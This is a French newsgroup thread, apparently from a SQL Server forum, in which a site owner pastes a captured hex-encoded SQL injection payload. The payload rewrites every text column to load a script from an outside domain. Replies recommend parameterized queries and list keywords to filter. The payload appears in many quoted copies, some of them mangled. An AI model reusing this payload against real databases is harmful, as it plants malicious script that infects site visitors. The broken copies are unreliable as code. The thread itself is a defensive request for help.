Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du type
NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D
Comme les données sont criptées, cette requette ne peut pas etre bloquée et
je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du type
NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%20@S%20NVARCHAR(4000);SET%20@SÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D
Comme les données sont criptées, cette requette ne peut pas etre bloquée et
je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du type
NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D
Comme les données sont criptées, cette requette ne peut pas etre bloquée et
je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%20@S%20NVARCHAR(4000);SET%20@SÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Bonjour,
Bonjour,
Dans : news:,
SQL disait :Bonjour,
Bonjour,Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour éliminer
ce problème, utilisez plutôt les requêtes paramétrées .
--
Fred
Dans : news:OxbJiUztIHA.5244@TK2MSFTNGP02.phx.gbl,
SQL disait :
Bonjour,
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour éliminer
ce problème, utilisez plutôt les requêtes paramétrées .
--
Fred
foleide@free.fr
Dans : news:,
SQL disait :Bonjour,
Bonjour,Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour éliminer
ce problème, utilisez plutôt les requêtes paramétrées .
--
Fred
Merci a tous mais je me suis mal exprimé.
La page par laquelle les hacker attaquent est une page .asp contenant 2
formulaires dont l'action est cette même page.
L'intrussion est produite par la récupération de l'URL complet retourné
par request.querystring auquel les hackers ajoute le requette d'incertion
dans la base.
l'exemple que je vous donne n'est que la partie ajoutée par les hackers
sur l'url.
Si vous m'avez compris, je suis preneur de vos réponses......
Merci
"Fred" a écrit dans le message de news:Dans : news:,
SQL disait :Bonjour,
Bonjour,Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour
éliminer ce problème, utilisez plutôt les requêtes paramétrées .
--
Fred
Merci a tous mais je me suis mal exprimé.
La page par laquelle les hacker attaquent est une page .asp contenant 2
formulaires dont l'action est cette même page.
L'intrussion est produite par la récupération de l'URL complet retourné
par request.querystring auquel les hackers ajoute le requette d'incertion
dans la base.
l'exemple que je vous donne n'est que la partie ajoutée par les hackers
sur l'url.
Si vous m'avez compris, je suis preneur de vos réponses......
Merci
"Fred" <foleide@free.fr.invalid> a écrit dans le message de news:
OlSkud0tIHA.2588@TK2MSFTNGP05.phx.gbl...
Dans : news:OxbJiUztIHA.5244@TK2MSFTNGP02.phx.gbl,
SQL disait :
Bonjour,
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour
éliminer ce problème, utilisez plutôt les requêtes paramétrées .
--
Fred
foleide@free.fr
Merci a tous mais je me suis mal exprimé.
La page par laquelle les hacker attaquent est une page .asp contenant 2
formulaires dont l'action est cette même page.
L'intrussion est produite par la récupération de l'URL complet retourné
par request.querystring auquel les hackers ajoute le requette d'incertion
dans la base.
l'exemple que je vous donne n'est que la partie ajoutée par les hackers
sur l'url.
Si vous m'avez compris, je suis preneur de vos réponses......
Merci
"Fred" a écrit dans le message de news:Dans : news:,
SQL disait :Bonjour,
Bonjour,Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour
éliminer ce problème, utilisez plutôt les requêtes paramétrées .
--
Fred
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%20@S%20NVARCHAR(4000);SET%20@SÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Evitez d'utiliser le SQL dynamique et si cela vous est impératif, testé
le contenu dynamique.
Dans le pire des cas, rechercher les motifs suivants :
CAST
sysobjects
DECLARE
SET @
...
A +
SQL a écrit :Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003
00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004
4E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre
bloquée et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Evitez d'utiliser le SQL dynamique et si cela vous est impératif, testé
le contenu dynamique.
Dans le pire des cas, rechercher les motifs suivants :
CAST
sysobjects
DECLARE
SET @
...
A +
SQL a écrit :
Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%20@S%20NVARCHAR(4000);SET%20@SÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003
00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004
4E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre
bloquée et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Evitez d'utiliser le SQL dynamique et si cela vous est impératif, testé
le contenu dynamique.
Dans le pire des cas, rechercher les motifs suivants :
CAST
sysobjects
DECLARE
SET @
...
A +
SQL a écrit :Bonjour,
Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR
Voici la requette
/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003
00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004
4E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Comme les données sont criptées, cette requette ne peut pas etre
bloquée et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.